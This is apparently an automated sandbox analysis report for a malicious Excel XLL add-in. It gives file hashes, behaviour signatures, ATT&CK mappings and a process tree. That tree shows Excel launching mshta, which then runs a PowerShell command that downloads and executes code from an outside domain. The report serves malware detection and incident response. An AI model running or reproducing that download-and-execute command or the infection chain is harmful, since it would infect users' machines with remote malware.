Analysis

  • max time kernel
    136s
  • max time network
    130s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-05-2024 01:20

General

  • Target

    a6052d953f77d1f9412b08434720420e41114419658b267bbb050a0f21a5cec4.xll

  • Size

    12KB

  • MD5

    ee6c79fd4247c2c265c16985c7459af4

  • SHA1

    7899162e9bccb0e16739814da2ad2ebca46a58b9

  • SHA256

    a6052d953f77d1f9412b08434720420e41114419658b267bbb050a0f21a5cec4

  • SHA512

    7d31f5e89e4a3bf9f51f7211f78d0ce07463a68bfc99276be4b99c17ed794726648c2012786fed9900ebc59bad042de8b31fe96645cf143cdaebef6ae84e9fb5

  • SSDEEP

    192:pL29RBzDzeobchBj8JONLON3qbruIrEPEjr7Ah83:J29jnbcvYJOEdq3uIvr7C0

Score
10/10

Malware Config

Extracted

Language
xlm4.0
Source

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\a6052d953f77d1f9412b08434720420e41114419658b267bbb050a0f21a5cec4.xll"
    1⤵
    • Loads dropped DLL
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3884
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta
      2⤵
      • Process spawned unexpected child process
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4836
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk')
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5088
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4440,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=3440 /prefetch:8
    1⤵
      PID:1164

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Execution

    Command and Scripting Interpreter

    1
    T1059

    PowerShell

    1
    T1059.001

    Discovery

    Query Registry

    3
    T1012

    System Information Discovery

    4
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\YOJF4VYG\d[1].htm
      Filesize

      2KB

      MD5

      f754844cfb65838d1dd6b19dde5d835c

      SHA1

      b3eb677783adc88c8d048898449e04d49f416db6

      SHA256

      3644b387519f3509a1ce3d2201e2e1e8af36217138cc6f9e62d6e37c887097a6

      SHA512

      f42f89562b5c0be86dbd04683ee6c30711155acd1239e273da726c2bfedf5d0806c479b7107792c136bff6e97efb8d9145df0c176f499f86f1b7e304a2e3ccdf

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x2u320kv.w1o.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\a6052d953f77d1f9412b08434720420e41114419658b267bbb050a0f21a5cec4.xll
      Filesize

      12KB

      MD5

      ee6c79fd4247c2c265c16985c7459af4

      SHA1

      7899162e9bccb0e16739814da2ad2ebca46a58b9

      SHA256

      a6052d953f77d1f9412b08434720420e41114419658b267bbb050a0f21a5cec4

      SHA512

      7d31f5e89e4a3bf9f51f7211f78d0ce07463a68bfc99276be4b99c17ed794726648c2012786fed9900ebc59bad042de8b31fe96645cf143cdaebef6ae84e9fb5

    • memory/3884-8-0x00007FFDC1530000-0x00007FFDC1725000-memory.dmp
      Filesize

      2.0MB

    • memory/3884-10-0x00007FFDC1530000-0x00007FFDC1725000-memory.dmp
      Filesize

      2.0MB

    • memory/3884-7-0x00007FFDC1530000-0x00007FFDC1725000-memory.dmp
      Filesize

      2.0MB

    • memory/3884-86-0x00007FFDC1530000-0x00007FFDC1725000-memory.dmp
      Filesize

      2.0MB

    • memory/3884-5-0x00007FFDC15CD000-0x00007FFDC15CE000-memory.dmp
      Filesize

      4KB

    • memory/3884-9-0x00007FFD7EEC0000-0x00007FFD7EED0000-memory.dmp
      Filesize

      64KB

    • memory/3884-0-0x00007FFD815B0000-0x00007FFD815C0000-memory.dmp
      Filesize

      64KB

    • memory/3884-84-0x00007FFD815B0000-0x00007FFD815C0000-memory.dmp
      Filesize

      64KB

    • memory/3884-13-0x00007FFDC1530000-0x00007FFDC1725000-memory.dmp
      Filesize

      2.0MB

    • memory/3884-14-0x00007FFDC1530000-0x00007FFDC1725000-memory.dmp
      Filesize

      2.0MB

    • memory/3884-16-0x00007FFDC1530000-0x00007FFDC1725000-memory.dmp
      Filesize

      2.0MB

    • memory/3884-15-0x00007FFDC1530000-0x00007FFDC1725000-memory.dmp
      Filesize

      2.0MB

    • memory/3884-12-0x00007FFDC1530000-0x00007FFDC1725000-memory.dmp
      Filesize

      2.0MB

    • memory/3884-85-0x00007FFD815B0000-0x00007FFD815C0000-memory.dmp
      Filesize

      64KB

    • memory/3884-4-0x00007FFD815B0000-0x00007FFD815C0000-memory.dmp
      Filesize

      64KB

    • memory/3884-3-0x00007FFD815B0000-0x00007FFD815C0000-memory.dmp
      Filesize

      64KB

    • memory/3884-6-0x00007FFDC1530000-0x00007FFDC1725000-memory.dmp
      Filesize

      2.0MB

    • memory/3884-1-0x00007FFD815B0000-0x00007FFD815C0000-memory.dmp
      Filesize

      64KB

    • memory/3884-11-0x00007FFD7EEC0000-0x00007FFD7EED0000-memory.dmp
      Filesize

      64KB

    • memory/3884-83-0x00007FFD815B0000-0x00007FFD815C0000-memory.dmp
      Filesize

      64KB

    • memory/3884-82-0x00007FFD815B0000-0x00007FFD815C0000-memory.dmp
      Filesize

      64KB

    • memory/3884-2-0x00007FFD815B0000-0x00007FFD815C0000-memory.dmp
      Filesize

      64KB

    • memory/3884-66-0x00007FFDC1530000-0x00007FFDC1725000-memory.dmp
      Filesize

      2.0MB

    • memory/5088-56-0x0000000005E20000-0x0000000005E3E000-memory.dmp
      Filesize

      120KB

    • memory/5088-57-0x0000000005E50000-0x0000000005E9C000-memory.dmp
      Filesize

      304KB

    • memory/5088-58-0x00000000076A0000-0x0000000007D1A000-memory.dmp
      Filesize

      6.5MB

    • memory/5088-59-0x0000000006320000-0x000000000633A000-memory.dmp
      Filesize

      104KB

    • memory/5088-55-0x0000000005920000-0x0000000005C74000-memory.dmp
      Filesize

      3.3MB

    • memory/5088-45-0x00000000057B0000-0x0000000005816000-memory.dmp
      Filesize

      408KB

    • memory/5088-44-0x0000000005740000-0x00000000057A6000-memory.dmp
      Filesize

      408KB

    • memory/5088-43-0x0000000004F60000-0x0000000004F82000-memory.dmp
      Filesize

      136KB

    • memory/5088-42-0x0000000004FA0000-0x00000000055C8000-memory.dmp
      Filesize

      6.2MB

    • memory/5088-41-0x0000000004840000-0x0000000004876000-memory.dmp
      Filesize

      216KB